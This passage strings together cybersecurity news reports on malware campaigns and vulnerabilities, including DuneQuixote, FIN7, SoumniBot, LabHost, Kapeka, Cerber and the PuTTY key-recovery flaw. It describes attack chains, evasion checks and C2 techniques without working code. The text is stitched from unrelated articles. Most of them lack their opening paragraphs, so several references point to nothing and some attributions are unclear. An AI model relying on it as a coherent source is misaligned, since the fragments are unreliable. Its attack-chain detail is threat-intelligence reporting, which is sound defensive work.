them into another device.
That said, one major unknown is whether the initial vector is a document or the
executable module ctrlpanel.exe.
"The advantage of the two-module virus is that it can be spread as a standalone
executable or as an infected document," Svajcer said.
"It may even be advantageous to initially spread as an executable as the module
can run standalone and set the registry keys to allow execution of the VBA code
and changing of the default saved file formats to .DOC before infecting
documents. That way, the infection may be a bit stealthier."
Russian cybersecurity company Kaspersky said it discovered the activity in
February 2024, with evidence suggesting that it may have been active since at
least a year prior. The campaign has been codenamed DuneQuixote.
"The group behind the campaign took steps to prevent collection and analysis of
its implants and implemented practical and well-designed evasion methods both in
network communications and in the malware code," Kaspersky said.
The starting point of the attack is a dropper, which comes in two variants -- a
regular dropper that's either implemented as an executable or a DLL file and a
tampered installer file for a legitimate tool named Total Commander.
Regardless of the method used, the primary function of the dropper is to extract
an embedded command-and-control (C2) address that's decrypted using a novel
technique to prevent the server address from being exposed to automated malware
analysis tools.
Specifically, it entails obtaining the filename of the dropper and stringing it
together with one of the many hard-coded snippets from Spanish poems present in
the dropper code. The malware then calculates the MD5 hash of the combined
string, which acts as the key to decode the C2 server address.
The dropper subsequently establishes connections with the C2 server and
downloads a next-stage payload after providing a hard-coded ID as the User-Agent
string in the HTTP request.
"The payload remains inaccessible for download unless the correct user agent is
provided," Kaspersky said. "Furthermore, it appears that the payload may only be
downloaded once per victim or is only available for a brief period following the
release of a malware sample into the wild."
The trojanized Total Commander installer, on the other hand, carries a few
differences despite retaining the main functionality of the original dropper.
It does away with the Spanish poem strings and implements additional
anti-analysis checks that prevent a connection to the C2 server should the
system have a debugger or a monitoring tool installed, the position of the
cursor does not change after a certain time, the amount of RAM available is less
than 8 GB, and the disk capacity is less than 40 GB.
CR4T ("CR4T.pdb") is a C/C++-based memory-only implant that grants attackers
access to a console for command line execution on the infected machine, performs
file operations, and uploads and downloads files after contacting the C2 server.
Kaspersky said it also unearthed a Golang version of CR4T with identical
features, in addition to possessing the ability to execute arbitrary commands
and create scheduled tasks using the Go-ole library.
On top of that, the Golang CR4T backdoor is equipped to achieve persistence by
utilizing the COM objects hijacking technique and leverage the Telegram API for
C2 communications.
The presence of the Golang variant is an indication that the unidentified threat
actors behind DuneQuixote are actively refining their tradecraft with
cross-platform malware.
"The 'DuneQuixote' campaign targets entities in the Middle East with an
interesting array of tools designed for stealth and persistence," Kaspersky
said.
"Through the deployment of memory-only implants and droppers masquerading as
legitimate software, mimicking the Total Commander installer, the attackers
demonstrate above average evasion capabilities and techniques."
"FIN7 identified employees at the company who worked in the IT department and
had higher levels of administrative rights," the BlackBerry research and
intelligence team said in a new write-up.
"They used the lure of a free IP scanning tool to run their well-known Anunak
backdoor and gain an initial foothold utilizing living off the land binaries,
scripts, and libraries (LOLBAS)."
FIN7, also known as Carbon Spider, Elbrus, Gold Niagara, ITG14, and Sangria
Tempest, is a well-known financially motivated e-crime group that has a track
record of striking a wide range of industry verticals to deliver malware capable
of stealing information from point-of-sale (PoS) systems since 2012.
In recent years, the threat actor has transitioned to conducting ransomware
operations, delivering various strains like Black Basta, Cl0p, DarkSide, and
REvil. Two Ukrainian members of the group, Fedir Hladyr and Andrii Kolpakov,
have been sentenced to prison in the U.S. to date.
The latest campaign discovered by BlackBerry in late 2023 starts with a
spear-phishing email that embeds a booby-trapped link pointing to a bogus site
("advanced-ip-sccanner[.]com") that masquerades as Advanced IP Scanner.
"This fake site redirected to 'myipscanner[.]com,' which in turn redirected to
an attacker-owned Dropbox that downloaded the malicious executable
WsTaskLoad.exe onto the victim's machine," the Canadian cybersecurity company
said.
The binary, for its part, initiates a multi-stage process that ultimately leads
to the execution of Carbanak. It's also designed to deliver additional payloads
such as POWERTRASH and establish persistence by installing OpenSSH for remote
access.
It's currently not known if the threat actors were planning on deploying
ransomware, as the infected system was detected early on and removed from the
network before it could reach the lateral movement stage.
While the target of the attack was a "large multinational automotive
manufacturer" based in the U.S., BlackBerry said it found several similar
malicious domains on the same provider, indicating that it may be part of a
wider campaign by FIN7.
To mitigate the risks posed by such threats, it's recommended that organizations
be on the lookout for phishing attempts, enable multi-factor authentication
(MFA), keep all software and systems up-to-date, and monitor for unusual login
attempts.
The malware is "notable for an unconventional approach to evading analysis and
detection, namely obfuscation of the Android manifest," Kaspersky researcher
Dmitry Kalinin said in a technical analysis.
Every Android app comes with a manifest XML file ("AndroidManifest.xml") that's
located in the root directory and declares the various components of the app, as
well as the permissions and the hardware and software features it requires.
Knowing that threat hunters typically commence their analysis by inspecting the
app's manifest file to determine its behavior, the threat actors behind the
malware have been found to leverage three different techniques to resist
analysis.
The first method involves the use of an invalid Compression method value when
unpacking the APK's manifest file using the libziparchive library, which treats
any value other than 0x0000 or 0x0008 as uncompressed.
"This allows app developers to put any value except 8 into the Compression
method and write uncompressed data," Kalinin explained.
"Although any unpacker that correctly implements compression method validation
would consider a manifest like that invalid, the Android APK parser recognizes
it correctly and allows the application to be installed."
It's worth pointing out here that the method has been adopted by threat actors
associated with several Android banking trojans since April 2023.
Secondly, SoumniBot misrepresents the archived manifest file size, providing a
value that exceeds the actual figure, as a result of which the "uncompressed"
file is directly copied, with the manifest parser ignoring the rest of the
"overlay" data that takes up the rest of the available space.
"Stricter manifest parsers wouldn't be able to read a file like that, whereas
the Android parser handles the invalid manifest without any errors," Kalinin
said.
The final technique has to do with utilizing long XML namespace names in the
manifest file, thus making it difficult for analysis tools to allocate enough
memory to process them. That said, the manifest parser is designed to ignore
namespaces, and, as a result, no errors are raised when handling the file.
SoumniBot, once launched, requests its configuration information from a
hard-coded server address to obtain the servers used to send the collected data
and receive commands using the MQTT messaging protocol, respectively.
It's designed to launch a malicious service that restarts every 16 minutes if it
terminates for some reason, and uploads the information every 15 seconds. This
includes device metadata, contact lists, SMS messages, photos, videos, and a
list of installed apps.
The malware is also capable of adding and deleting contacts, sending SMS
messages, toggling silent mode, and enabling Android's debug mode, not to
mention hiding the app icon to make it difficult to uninstall from the device.
One noteworthy feature of SoumniBot is its ability to search the external
storage media for .key and .der files containing paths to "/NPKI/yessign," which
refers to the digital signature certificate service offered by South Korea for
governments (GPKI), banks, and online stock exchanges (NPKI).
"These files are digital certificates issued by Korean banks to their clients
and used for signing in to online banking services or confirming banking
transactions," Kalinin said. "This technique is quite uncommon for Android
banking malware."
Earlier this year, cybersecurity company S2W revealed details of a malware
campaign undertaken by the North Korea-linked Kimusuky group that made use of a
Golang-based information stealer called Troll Stealer to siphon GPKI
certificates from Windows systems.
"Malware creators seek to maximize the number of devices they infect without
being noticed," Kalinin concluded. "This motivates them to look for new ways of
complicating detection. The developers of SoumniBot unfortunately succeeded due
to insufficiently strict validations in the Android manifest parser code."
Described as one of the largest Phishing-as-a-Service (PhaaS) providers, LabHost
offered phishing pages targeting banks, high-profile organizations, and other
service providers located primarily in Canada, the U.S., and the U.K.
As part of the operation, codenamed Nebulae, two LabHost users from Melbourne
and Adelaide were arrested on April 17, with three others arrested and charged
with drug-related offenses.
"Australian offenders are allegedly among 10,000 cybercriminals globally who
have used the platform, known as LabHost, to trick victims into providing their
personal information, such as online banking logins, credit card details and
passwords, through persistent phishing attacks sent via texts and emails," the
Australian Federal Police (AFP) said in a statement.
The Europol-led coordinated effort also witnessed 32 other individuals being
apprehended between April 14 and 17, including four in the U.K. who are
allegedly responsible for developing and running the service. In total, 70
addresses were searched across the world.
Coinciding with the arrests, LabHost ("lab-host[.]ru") and all its associated
cluster of phishing sites have been confiscated and replaced with a message
announcing their seizure.
LabHost was documented earlier this year by Fortra, detailing its PhaaS
targeting popular brands globally for anywhere between $179 to $300 per month.
It first emerged in the fourth quarter of 2021, coinciding with the availability
of another PhaaS service called Frappo.
"LabHost divides their available phishing kits between two separate subscription
packages: a North American membership covering U.S. and Canadian brands, and an
international membership consisting of various global brands (and excluding the
NA brands)," the company said.
According to Trend Micro, LabHost also provided phishing pages for Spotify,
postal services such as DHL and An Post, car toll services, and insurance
providers, besides allowing customers to request the creation of bespoke
phishing pages for target brands.
"Since the platform takes care of most of the tedious tasks in developing and
managing phishing page infrastructure, all the malicious actor needs is a
virtual private server (VPS) to host the files and from which the platform can
automatically deploy," Trend Micro said.
The phishing pages – links to which are distributed via phishing and smishing
campaigns – are designed to mimic banks, government entities, and other major
organizations, deceiving users into entering their credentials and two-factor
authentication (2FA) codes.
Customers of the phishing kit, which comprises the infrastructure to host the
fraudulent websites as well as email and SMS content generation services, could
then use the stolen information to take control of the online accounts and make
unauthorized fund transfers from victims' bank accounts.
The captured information encompassed names and addresses, emails, dates of
birth, standard security question answers, card numbers, passwords, and PINs.
"Labhost offered a menu of over 170 fake websites providing convincing phishing
pages for its users to choose from," Europol said, adding law enforcement
agencies from 19 countries participated in the disruption.
"What made LabHost particularly destructive was its integrated campaign
management tool named LabRat. This feature allowed cybercriminals deploying the
attacks to monitor and control those attacks in real time. LabRat was designed
to capture two-factor authentication codes and credentials, allowing the
criminals to bypass enhanced security measures."
LabHost's phishing infrastructure is estimated to include more than 40,000
domains. More than 94,000 victims have been identified in Australia and
approximately 70,000 U.K. victims have been found to have entered their details
in one of the bogus sites.
The U.K. Metropolitan Police said LabHost has received about £1 million
($1,173,000) in payments from criminal users since its launch. The service is
estimated to have obtained 480,000 card numbers, 64,000 PIN numbers, as well as
no less than one million passwords used for websites and other online services.
PhaaS platforms like LabHost lower the barrier for entry into the world of
cybercrime, permitting aspiring and unskilled threat actors to mount phishing
attacks at scale. In other words, a PhaaS makes it possible to outsource the
need to develop and host phishing pages.
"LabHost is yet another example of the borderless nature of cybercrime and the
takedown reinforces the powerful outcomes that can be achieved through a united,
global law enforcement front," said AFP Acting Assistant Commissioner Cyber
Command Chris Goldsmid.
The development comes as Europol revealed that organized criminal networks are
increasingly agile, borderless, controlling, and destructive (ABCD),
underscoring the need for a "concerted, sustained, multilateral response and
joint cooperation."
That's according to the Microsoft Threat Intelligence team, which said the flaws
have been weaponized since the start of April 2024.
OpenMetadata is an open-source platform that operates as a metadata management
tool, offering a unified solution for data asset discovery, observability, and
governance.
The flaws in question – all discovered and credited to security researcher
Alvaro Muñoz – are listed below -
CVE-2024-28847 (CVSS score: 8.8) - A Spring Expression Language (SpEL) injection
vulnerability in PUT /api/v1/events/subscriptions (fixed in version 1.2.4)
CVE-2024-28848 (CVSS score: 8.8) - A SpEL injection vulnerability in GET
/api/v1/policies/validation/condition/<expr> (fixed in version 1.2.4)
CVE-2024-28253 (CVSS score: 8.8) - A SpEL injection vulnerability in PUT
/api/v1/policies (fixed in version 1.3.1) CVE-2024-28254 (CVSS score: 8.8) -
A SpEL injection vulnerability in GET
/api/v1/events/subscriptions/validation/condition/<expr> (fixed in version
1.2.4) CVE-2024-28255 (CVSS score: 9.8) - An authentication bypass
vulnerability (fixed in version 1.2.4) Successful exploitation of the
vulnerabilities could allow a threat actor to bypass authentication and achieve
remote code execution.
The modus operandi uncovered by Microsoft entails the targeting of
internet-exposed OpenMetadata workloads that have been left unpatched to gain
code execution on the container running the OpenMetadata image.
Upon gaining an initial foothold, the threat actors have been observed carrying
out reconnaissance activities to determine their level of access to the
compromised environment and gather details about the network and hardware
configuration, operating system version, the number of active users, and the
environment variables.
"This reconnaissance step often involves contacting a publicly available
service," security researchers Hagai Ran Kestenberg and Yossi Weizman said.
"In this specific attack, the attackers send ping requests to domains that end
with oast[.]me and oast[.]pro, which are associated with Interactsh, an
open-source tool for detecting out-of-band interactions."
In doing so, the idea is to validate network connectivity from the infiltrated
system to attacker-controlled infrastructure without raising any red flags,
thereby giving threat actors the confidence to establish command-and-control
(C2) communications and deploy additional payloads.
The end goal of the attacks is to retrieve and deploy a Windows or Linux variant
of the crypto-mining malware from a remote server located in China, depending on
the operating system.
Once the miner is launched, the initial payloads are removed from the workload,
and the attackers initiate a reverse shell for their remote server using the
Netcat tool, permitting them to commandeer the system. Persistence is achieved
by setting cron jobs to run the malicious code at predefined intervals.
Interestingly, the threat actor also leaves behind a personal note telling that
they are poor and that they need the money to buy a car and a suite. "I don't
want to do anything illegal," the note reads.
OpenMetadata users are advised to switch to strong authentication methods, avoid
using default credentials, and update their images to the latest version.
"This attack serves as a valuable reminder of why it's crucial to stay compliant
and run fully patched workloads in containerized environments," the researchers
said.
The development comes as publicly accessible Redis servers that have the
authentication feature disabled or have unpatched flaws are being targeted to
install Metasploit Meterpreter payloads for post-exploitation.
"When Metasploit is installed, the threat actor can take control of the infected
system and also dominate the internal network of an organization using the
various features offered by the malware," the AhnLab Security Intelligence
Center (ASEC) said.
It also follows a report from WithSecure that detailed how search permissions on
Docker directories could be abused to achieve privilege escalation. It's worth
pointing out that the issue (CVE-2021-41091, CVSS score: 6.3) was previously
flagged by CyberArk in February 2022, and addressed by Docker in version
20.10.9.
"The setting of the searchable bit for other users on /var/lib/docker/ and child
directories can allow for a low-privileged attacker to gain access to various
containers' filesystems," WithSecure said.
"The threat actor registered multiple look-alike domains using a typosquatting
technique and leveraged Google Ads to push these domains to the top of search
engine results targeting specific search keywords, thereby luring victims to
visit these sites," Zscaler ThreatLabz researchers Roy Tay and Sudeep Singh
said.
As many as 45 domains are said to have been registered between November 2023 and
March 2024, with the sites masquerading as port scanning and IT management
software such as Advanced IP Scanner, Angry IP Scanner, IP scanner PRTG, and
ManageEngine.
While this is not the first time threat actors are banking on malvertising
techniques to serve malware via lookalike sites, the development marks the first
time the delivery vehicle is being used to propagate a sophisticated Windows
backdoor.
Thus, users who end up searching for such tools are displayed bogus sites that
include JavaScript code designed to download a malicious file
("Advanced-ip-scanner.zip") upon clicking the download button.
Present within the ZIP archive is a DLL file ("IVIEWERS.dll") and an executable
("Advanced-ip-scanner.exe"), the latter of which uses DLL side-loading to load
the DLL and activate the infection sequence.
The DLL file is responsible for injecting the shellcode into the
"Advanced-ip-scanner.exe" process via a technique called process hollowing,
following which the injected EXE file unpacks two additional files –
OneDrive.exe and Secur32.dll.
OneDrive.exe, a legitimate signed Microsoft binary, is then abused to sideload
Secur32.dll, and ultimately execute the shellcode backdoor, but not before
setting up persistence on the host by means of a scheduled task and disabling
Microsoft Defender Antivirus.
The backdoor – so named for its use of DNS MX queries for command-and-control
(C2) – is designed to gather system information, run commands via cmd.exe, and
perform basic file manipulation operations such as reading, writing, and
deleting files.
It sends requests to the C2 server ("litterbolo[.]com") by encoding the data in
the subdomain(s) of the Fully Qualified Domain Name (FQDN) in a DNS mail
exchange (MX) query packet and receives commands encoded within the response
packet.
"The backdoor uses techniques such as multiple stages of DLL side-loading and
DNS tunneling for command-and-control (C2) communication as a means to evade
endpoint and network security solutions, respectively," Tay and Singh said.
"In addition, the backdoor uses evasive techniques like anti-dumping to prevent
memory analysis and hinder forensics security solutions."
There is currently no indication of where the malware operators originate from
or what their intentions are, but Zscaler said it identified two accounts
created by them on criminal underground forums like blackhatworld[.]com and
social-eng[.]ru using the email address wh8842480@gmail[.]com, which was also
used to register a domain spoofing Advanced IP Scanner.
Specifically, the threat actor has been found engaging in posts offering ways to
set up unlimited Google AdSense threshold accounts way back in June 2023,
indicating their interest in launching their own long-lasting malvertising
campaign.
"Google Ads threshold accounts and techniques for abusing them are often traded
on BlackHat forums," the researchers said. "Many times they offer a way for the
threat actor to add as many credits as possible to run Google Ads campaigns."
"This allows the threat actors to run campaigns without actually paying until
the threshold limit. A reasonably high threshold limit lets the threat actor run
the ad campaign for a significant amount of time."
The findings come from Finnish cybersecurity firm WithSecure, which attributed
the malware to the Russia-linked advanced persistent threat (APT) group tracked
as Sandworm (aka APT44 or Seashell Blizzard). Microsoft is tracking the same
malware under the name KnuckleTouch.
"The malware [...] is a flexible backdoor with all the necessary functionalities
to serve as an early-stage toolkit for its operators, and also to provide
long-term access to the victim estate," security researcher Mohammad Kazem
Hassan Nejad said.
Kapeka comes fitted with a dropper that's designed to launch and execute a
backdoor component on the infected host, after which it removes itself. The
dropper is also responsible for setting up persistence for the backdoor either
as a scheduled task or autorun registry, depending on whether the process has
SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as
involved in multiple campaigns distributing ransomware and that it can be used
to carry out a variety of functions, such as stealing credentials and other
data, conducting destructive attacks, and granting threat actors remote access
to the device.
The backdoor is a Windows DLL written in C++ and features an embedded
command-and-control (C2) configuration that's used to establish contact with an
actor-controlled server and holds information about the frequency at which the
server needs to be polled in order to retrieve commands.
Besides masquerading as a Microsoft Word add-in to make it appear genuine, the
backdoor DLL gathers information about the compromised host and implements
multi-threading to fetch incoming instructions, process them, and exfiltrate the
results of the execution to the C2 server.
"The backdoor uses WinHttp 5.1 COM interface (winhttpcom.dll) to implement its
network communication component," Nejad explained. "The backdoor communicates
with its C2 to poll for tasks and to send back fingerprinted information and
task results. The backdoor utilizes JSON to send and receive information from
its C2."
The implant is also capable of updating its C2 configuration on-the-fly by
receiving a new version from the C2 server during polling. Some of the main
features of the backdoor allow it to read and write files from and to disk,
launch payloads, execute shell commands, and even upgrade and uninstall itself.
The exact method through which the malware is propagated is currently unknown.
However, Microsoft noted that the dropper is retrieved from compromised websites
using the certutil utility, underscoring the use of a legitimate
living-off-the-land binary (LOLBin) to orchestrate the attack.
Kapeka's connections to Sandworm come conceptual and configuration overlaps with
previously disclosed families like GreyEnergy, a likely successor to the
BlackEnergy toolkit, and Prestige.
"It is likely that Kapeka was used in intrusions that led to the deployment of
Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka
is a successor to GreyEnergy, which itself was likely a replacement for
BlackEnergy in Sandworm's arsenal."
"The backdoor's victimology, infrequent sightings, and level of stealth and
sophistication indicate APT-level activity, highly likely of Russian origin."
The attacks leverage CVE-2023-22518 (CVSS score: 9.1), a critical security
vulnerability impacting the Atlassian Confluence Data Center and Server that
allows an unauthenticated attacker to reset Confluence and create an
administrator account.
Armed with this access, a threat actor could take over affected systems, leading
to a full loss of confidentiality, integrity, and availability.
According to cloud security firm Cado, financially motivated cybercrime groups
have been observed abusing the newly created admin account to install the
Effluence web shell plugin and allow for the execution of arbitrary commands on
the host.
"The attacker uses this web shell to download and run the primary Cerber
payload," Nate Bill, threat intelligence engineer at Cado, said in a report
shared with The Hacker News.
"In a default install, the Confluence application is executed as the
'confluence' user, a low privilege user. As such, the data the ransomware is
able to encrypt is limited to files owned by the confluence user."
It's worth noting that the exploitation of CVE-2023-22518 to deploy Cerber
ransomware was previously highlighted by Rapid7 in November 2023.
Written in C++, the primary payload acts as a loader for additional C++-based
malware by retrieving them from a command-and-control (C2) server and then
erasing its own presence from the infected host.
It includes "agttydck.bat," which is executed to download the encryptor
("agttydcb.bat") that's subsequently launched by the primary payload.
It's suspected that agttydck functions akin to a permission checker for the
malware, assessing its ability to write to a /tmp/ck.log file. The exact purpose
of this check is unclear.
The encryptor, on the other hand, traverses the root directory and encrypts all
contents with a .L0CK3D extension. It also drops a ransom note in each
directory. However, no data exfiltration takes place despite claims to the
contrary in the note.
The most interesting aspect of the attacks is the use of pure C++ payloads,
which are becoming something of a rarity given the shift to cross-platform
programming languages like Golang and Rust.
"Cerber is a relatively sophisticated, albeit aging, ransomware payload," Bill
said. "While the use of the Confluence vulnerability allows it to compromise a
large amount of likely high value systems, often the data it is able to encrypt
will be limited to just the confluence data and in well configured systems this
will be backed up."
"This greatly limits the efficacy of the ransomware in extracting money from
victims, as there is much less incentive to pay up," the researcher added.
The development comes amid the emergence of new ransomware families like Evil
Ant, HelloFire, L00KUPRU (an Xorist ransomware variant), Muliaka (based on the
leaked Conti ransomware code), Napoli (a Chaos ransomware variant), Red
CryptoApp, Risen, and SEXi (based on the leaked Babuk ransomware code) that have
been spotted targeting Windows and VMware ESXi servers.
Ransomware actors are also leveraging the leaked LockBit ransomware source code
to spawn their own custom variants like Lambda (aka Synapse), Mordor, and Zgut,
according to reports from F.A.C.C.T. and Kaspersky.
The latter's analysis of the leaked LockBit 3.0 builder files has revealed the
"alarming simplicity" with which attackers can craft bespoke ransomware and
augment their capabilities with more potent features.
Kaspersky said it uncovered a tailored version with the ability to spread across
the network via PsExec by taking advantage of stolen administrator credentials
and performing malicious activities, such as terminating Microsoft Defender
Antivirus and erasing Windows Event Logs in order to encrypt the data and cover
its tracks.
"This underscores the need for robust security measures capable of mitigating
this kind of threat effectively, as well as adoption of a cybersecurity culture
among employees," the company said.
Cybersecurity researchers have discovered a new campaign that's exploiting a
recently disclosed security flaw in Fortinet FortiClient EMS devices to deliver
ScreenConnect and Metasploit Powerfun payloads.
The activity entails the exploitation of CVE-2023-48788 (CVSS score: 9.3), a
critical SQL injection flaw that could permit an unauthenticated attacker to
execute unauthorized code or commands via specifically crafted requests.
Cybersecurity firm Forescout is tracking the campaign under the codename
Connect:fun owing to the use of ScreenConnect and Powerfun for
post-exploitation.
The intrusion targeted an unnamed media company that had its vulnerable
FortiClient EMS device exposed to the internet shortly after the release of a
proof-of-concept (PoC) exploit for the flaw on March 21, 2024.
Over the next couple of days, the unknown adversary was observed leveraging the
flaw to unsuccessfully download ScreenConnect and then install the remote
desktop software using the msiexec utility.
However, on March 25, the PoC exploit was used to launch PowerShell code that
downloaded Metasploit's Powerfun script and initiated a reverse connection to
another IP address.
Also detected were SQL statements designed to download ScreenConnect from a
remote domain ("ursketz[.]com") using certutil, which was then installed via
msiexec before establishing connections with a command-and-control (C2) server.
There is evidence to suggest that the threat actor behind it has been active
since at least 2022, specifically singling out Fortinet appliances and using
Vietnamese and German languages in their infrastructure.
"The observed activity clearly has a manual component evidenced by all the
failed attempts to download and install tools, as well as the relatively long
time taken between attempts," security researcher Sai Molige said.
"This is evidence that this activity is part of a specific campaign, rather than
an exploit included in automated cybercriminal botnets. From our observations,
it appears that the actors behind this campaign are not mass scanning but
choosing target environments that have VPN appliances."
Forescout said the attack shares tactical and infrastructure overlaps with other
incidents documented by Palo Alto Networks Unit 42 and Blumira in March 2024
that involve the abuse of CVE-2023-48788 to download ScreenConnect and Atera.
Organizations are recommended to apply patches provided by Fortinet to address
potential threats, monitor for suspicious traffic, and use a web application
firewall (WAF) to block potentially malicious requests.
"These attacks all appear to be originating from TOR exit nodes and a range of
other anonymizing tunnels and proxies," Cisco Talos said.
Successful attacks could pave the way for unauthorized network access, account
lockouts, or denial-of-service conditions, the cybersecurity company added.
The attacks, said to be broad and opportunistic, have been observed targeting
the below devices -
Cisco Secure Firewall VPN Checkpoint VPN Fortinet VPN SonicWall VPN
RD Web Services Mikrotik Draytek Ubiquiti Cisco Talos described the
brute-forcing attempts as using both generic and valid usernames for specific
organizations, with the attacks indiscriminately targeting a wide range of
sectors across geographies.
The source IP addresses for the traffic are commonly associated with proxy
services. This includes TOR, VPN Gate, IPIDEA Proxy, BigMama Proxy, Space
Proxies, Nexus Proxy, and Proxy Rack, among others.
The complete list of indicators associated with the activity, such as the IP
addresses and the usernames/passwords, can be accessed here.
The development comes as the networking equipment major warned of password spray
attacks targeting remote access VPN services as part of what it said are
"reconnaissance efforts."
It also follows a report from Fortinet FortiGuard Labs that threat actors are
continuing to exploit a now-patched security flaw impacting TP-Link Archer AX21
routers (CVE-2023-1389, CVSS score: 8.8) to deliver DDoS botnet malware families
like AGoent, Condi, Gafgyt, Mirai, Miori, and MooBot.
"As usual, botnets relentlessly target IoT vulnerabilities, continuously
attempting to exploit them," security researchers Cara Lin and Vincent Li said.
"Users should be vigilant against DDoS botnets and promptly apply patches to
safeguard their network environments from infection, preventing them from
becoming bots for malicious threat actors."
"The OpenJS Foundation Cross Project Council received a suspicious series of
emails with similar messages, bearing different names and overlapping
GitHub-associated emails," OpenJS Foundation and Open Source Security Foundation
(OpenSSF) said in a joint alert.
According to Robin Bender Ginn, executive director of OpenJS Foundation, and
Omkhar Arasaratnam, general manager at OpenSSF, the email messages urged OpenJS
to take action to update one of its popular JavaScript projects to remediate
critical vulnerabilities without providing any specifics.
The email author(s) also called on OpenJS to designate them as a new maintainer
of the project despite having little prior involvement. Two other popular
JavaScript projects not hosted by OpenJS are also said to have been at the
receiving end of similar activity.
That said, none of the people who contacted OpenJS were granted privileged
access to the OpenJS-hosted project.
The incident brings into sharp focus the method by which the lone maintainer of
XZ Utils was targeted by fictitious personas that were expressly created for
what's believed to be a social engineering-cum-pressure campaign designed to
make Jia Tan (aka JiaT75) a co-maintainer of the project.
This has raised the possibility that the attempt to sabotage XZ Utils may not be
an isolated incident and that it's part of a broader campaign to undermine the
security of various projects, the two open source groups said. The names of the
JavaScript projects were not disclosed.
Jia Tan, as it stands, has no other digital footprints outside of their
contributions, indicating that the account was invented for the sole purpose of
gaining the credibility of the open-source development community over years and
ultimately push a stealthy backdoor into XZ Utils.
It also serves to pinpoint the sophistication and patience that has gone behind
planning and executing the campaign by targeting an open-source, volunteer-run
project that's used in many Linux distributions, putting organizations and users
at risk of supply chain attacks.
The XZ Utils backdoor incident also highlights the "fragility" of the
open-source ecosystem and the risks created by maintainer burnout, the U.S.
Cybersecurity and Infrastructure Security Agency (CISA) said last week.
"The burden of security shouldn't fall on an individual open-source maintainer —
as it did in this case to near-disastrous effect," CISA officials Jack Cable and
Aeva Black said.
"Every technology manufacturer that profits from open source software must do
their part by being responsible consumers of and sustainable contributors to the
open source packages they depend on."
The agency is recommending that technology manufacturers and system operators
that incorporate open-source components should either directly or support the
maintainers in periodically auditing the source code, eliminating entire classes
of vulnerabilities, and implementing other secure by design principles.
"These social engineering attacks are exploiting the sense of duty that
maintainers have with their project and community in order to manipulate them,"
Bender Ginn and Arasaratnam said.
"Pay attention to how interactions make you feel. Interactions that create
self-doubt, feelings of inadequacy, of not doing enough for the project, etc.
might be part of a social engineering attack."
"The group made extensive use of steganography by sending VBSs, PowerShell code,
as well as RTF documents with an embedded exploit, inside images and text
files," Russian cybersecurity company Positive Technologies said in a Monday
report.
The campaign has been codenamed SteganoAmor for its reliance on steganography
and the choice of file names such as greatloverstory.vbs and easytolove.vbs.
A majority of the attacks have targeted industrial, services, public, electric
power, and construction sectors in Latin American countries, although companies
located in Russia, Romania, and Turkey have also been singled out.
The development comes as TA558 has also been spotted deploying Venom RAT via
phishing attacks aimed at enterprises located in Spain, Mexico, the United
States, Colombia, Portugal, Brazil, Dominican Republic, and Argentina.
It all starts with a phishing email containing a booby-trapped email Microsoft
Excel attachment that exploits a now-patched security flaw in Equation Editor
(CVE-2017-11882) to download a Visual Basic Script that, in turn, fetches the
next-stage payload from paste[.]ee.
The obfuscated malicious code takes care of downloading two images from an
external URL that come embedded with a Base64-encoded component that ultimately
retrieves and executes the Agent Tesla malware on the compromised host.
Beyond Agent Tesla, other variants of the attack chain have led to an assortment
of malware such as FormBook, GuLoader, LokiBot, Remcos RAT, Snake Keylogger, and
XWorm, which are designed for remote access, data theft, and delivery of
secondary payloads.
The phishing emails are sent from legitimate-but-compromised SMTP servers to
lend the messages a little credibility and minimize the chances of them getting
blocked by email gateways. In addition, TA558 has been found to use infected FTP
servers to stage the stolen data.
The disclosure comes against the backdrop of a series of phishing attacks
targeting government organizations in Russia, Belarus, Kazakhstan, Uzbekistan,
Kyrgyzstan, Tajikistan, and Armenia with a malware dubbed LazyStealer to harvest
credentials from Google Chrome.
Positive Technologies is tracking the activity cluster under the name Lazy Koala
in reference to the name of the user (joekoala), who is said to control the
Telegram bots that receive the stolen data.
That said, the victim geography and the malware artifacts indicate potential
links to another hacking group tracked by Cisco Talos under the name YoroTrooper
(aka SturgeonPhisher).
"The group's main tool is a primitive stealer, whose protection helps to evade
detection, slow down analysis, grab all the stolen data, and send it to
Telegram, which has been gaining popularity with malicious actors by the year,"
security researcher Vladislav Lunin said.
The findings also follow a wave of social engineering campaigns that are
designed to propagate malware families like FatalRAT and SolarMarker.
The vulnerability has been codenamed LeakyCLI by cloud security firm Orca.
"Some commands on Azure CLI, AWS CLI, and Google Cloud CLI can expose sensitive
information in the form of environment variables, which can be collected by
adversaries when published by tools such as GitHub Actions," security researcher
Roi Nisimi said in a report shared with The Hacker News.
Microsoft has since addressed the issue as part of security updates released in
November 2023, assigned it the CVE identifier CVE-2023-36052 (CVSS score: 8.6).
The idea, in a nutshell, has to do with how the CLI commands such as could be
used to show (pre-)defined environment variables and output to Continuous
Integration and Continuous Deployment (CI/CD) logs. A list of such commands
spanning AWS and Google Cloud is below 0
aws lambda get-function-configuration aws lambda get-function aws lambda
update-function-configuration aws lambda update-function-code aws lambda
publish-version gcloud functions deploy <func> --set-env-vars gcloud
functions deploy <func> --update-env-vars gcloud functions deploy <func>
--remove-env-vars Orca said it found several projects on GitHub that
inadvertently leaked access tokens and other sensitive data via Github Actions,
CircleCI, TravisCI, and Cloud Build logs.
Unlike Microsoft, however, both Amazon and Google consider this to be expected
behavior, requiring that organizations take steps to avoid storing secrets in
environment variables and instead use a dedicated secrets store service like AWS
Secrets Manager or Google Cloud Secret Manager.
Google also recommends the use of the "--no-user-output-enabled" option to
suppress the printing of command output to standard output and standard error in
the terminal.
"If bad actors get their hands on these environment variables, this could
potentially lead to view sensitive information including credentials, such as
passwords, user names, and keys, which could allow them to access any resources
that the repository owners can," Nisimi said.
"CLI commands are by default assumed to be running in a secure environment, but
coupled with CI/CD pipelines, they may pose a security threat."
The flaw has been assigned the CVE identifier CVE-2024-31497, with the discovery
credited to researchers Fabian Bäumer and Marcus Brinkmann of the Ruhr
University Bochum.
"The effect of the vulnerability is to compromise the private key," the PuTTY
project said in an advisory.
"An attacker in possession of a few dozen signed messages and the public key has
enough information to recover the private key, and then forge signatures as if
they were from you, allowing them to (for instance) log in to any servers you
use that key for."
However, in order to obtain the signatures, an attacker will have to compromise
the server for which the key is used to authenticate to.
In a message posted on the Open Source Software Security (oss-sec) mailing list,
Bäumer described the flaw as stemming from the generation of biased ECDSA
cryptographic nonces, which could enable the recovery of the private key.
"The first 9 bits of each ECDSA nonce are zero," Bäumer explained. "This allows
for full secret key recovery in roughly 60 signatures by using state-of-the-art
techniques."
"These signatures can either be harvested by a malicious server
